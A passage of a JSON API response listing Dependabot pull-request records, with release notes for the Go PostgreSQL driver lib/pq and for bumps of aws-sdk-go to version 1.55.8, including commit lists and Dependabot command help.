details.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eCopyIn()\u003c/code\u003e and \u003ccode\u003eCopyInToSchema()\u003c/code\u003e have been marked as deprecated. These are\nsimple query builders and not needed for \u003ccode\u003eCOPY [..] FROM STDIN\u003c/code\u003e support (which\nis \u003cem\u003enot\u003c/em\u003e deprecated). (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1279\"\u003e#1279\u003c/a\u003e)\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e// Old\ntx.Prepare(CopyIn(\u0026quot;temp\u0026quot;, \u0026quot;num\u0026quot;, \u0026quot;text\u0026quot;, \u0026quot;blob\u0026quot;, \u0026quot;nothing\u0026quot;))\n\u003cp\u003e// Replacement\ntx.Prepare(\u003ccode\u003ecopy temp (num, text, blob, nothing) from stdin\u003c/code\u003e)\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eSupport protocol 3.2, and the \u003ccode\u003emin_protocol_version\u003c/code\u003e and\n\u003ccode\u003emax_protocol_version\u003c/code\u003e DSN parameters (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1258\"\u003e#1258\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003esslmode=prefer\u003c/code\u003e and \u003ccode\u003esslmode=allow\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1270\"\u003e#1270\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003essl_min_protocol_version\u003c/code\u003e and \u003ccode\u003essl_max_protocol_version\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1277\"\u003e#1277\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport connection service file to load connection details (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1285\"\u003e#1285\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003esslrootcert=system\u003c/code\u003e and use \u003ccode\u003e~/.postgresql/root.crt\u003c/code\u003e as the default\nvalue of sslrootcert (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1280\"\u003e#1280\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/lib/pq/issues/1281\"\u003e#1281\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdd a new \u003ccode\u003epqerror\u003c/code\u003e package with PostgreSQL error codes (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1275\"\u003e#1275\u003c/a\u003e).\u003c/p\u003e\n\u003cp\u003eFor example, to test if an error is a UNIQUE constraint violation:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003eif pqErr, ok := errors.AsType[*pq.Error](https://github.com/lib/pq/blob/master/err); ok \u0026amp;\u0026amp; pqErr.Code == pqerror.UniqueViolation {\n    log.Fatalf(\u0026quot;email %q already exsts\u0026quot;, email)\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eTo make this a bit more convenient, it also adds a \u003ccode\u003epq.As()\u003c/code\u003e function:\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lib/pq/commit/1464d694fb07af969eb29f60a54f2a90aacdd621\"\u003e\u003ccode\u003e1464d69\u003c/code\u003e\u003c/a\u003e Release v1.12.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lib/pq/commit/5a64c116462db2c585ac7b13c7fb41fcacec91bd\"\u003e\u003ccode\u003e5a64c11\u003c/code\u003e\u003c/a\u003e Fix fromDSN() doc comment\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lib/pq/commit/7f79f1b81ef30630aa9dcacca516997b0f6f6891\"\u003e\u003ccode\u003e7f79f1b\u003c/code\u003e\u003c/a\u003e Fix trailing quote in fromDSN() error message\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lib/pq/commit/e0a292e195790d04df3b4aa...\n\n_Description has been truncated_","html_url":"https://github.com/TheThingsNetwork/lorawan-stack/pull/7873","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheThingsNetwork%2Florawan-stack/issues/7873","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/7873/packages"}},{"old_version":"1.55.5","new_version":"1.55.8","update_type":"patch","path":"/pkg/build","pr_created_at":"2026-03-25T06:50:21.000Z","version_change":"1.55.5 → 1.55.8","issue":{"uuid":"4133054024","node_id":"PR_kwDORwJmf87NPaAM","number":19,"state":"open","title":"Chore(deps): Bump github.com/aws/aws-sdk-go from 1.55.5 to 1.55.8 in /pkg/build","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-03-25T06:50:21.000Z","updated_at":"2026-03-25T06:50:24.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Chore(deps): Bump","packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.5","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"}],"path":"/pkg/build","ecosystem":"go"},"body":"Bumps [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) from 1.55.5 to 1.55.8.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.6 (2025-01-15)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix broken printf for go1.24\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.5...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=github.com/aws/aws-sdk-go\u0026package-manager=go_modules\u0026previous-version=1.55.5\u0026new-version=1.55.8)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/harmoni-code-review-benchmark-org/grafana__grafana__harmoni-engineer__PR97529__20260325/pull/19","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/harmoni-code-review-benchmark-org%2Fgrafana__grafana__harmoni-engineer__PR97529__20260325/issues/19","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/19/packages"}},{"old_version":"1.55.7","new_version":"1.55.8","update_type":"patch","path":"/pkg/build","pr_created_at":"2026-03-25T06:16:52.000Z","version_change":"1.55.7 → 1.55.8","issue":{"uuid":"4132889507","node_id":"PR_kwDORwHqJM7NO-p5","number":27,"state":"open","title":"Bump github.com/aws/aws-sdk-go from 1.55.7 to 1.55.8 in /pkg/build","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-03-25T06:16:52.000Z","updated_at":"2026-03-25T06:16:54.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"}],"path":"/pkg/build","ecosystem":"go"},"body":"Bumps [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) from 1.55.7 to 1.55.8.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=github.com/aws/aws-sdk-go\u0026package-manager=go_modules\u0026previous-version=1.55.7\u0026new-version=1.55.8)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/harmoni-code-review-benchmark-org/grafana__grafana__harmoni-engineer__PR106778__20260324/pull/27","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/harmoni-code-review-benchmark-org%2Fgrafana__grafana__harmoni-engineer__PR106778__20260324/issues/27","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/27/packages"}}]}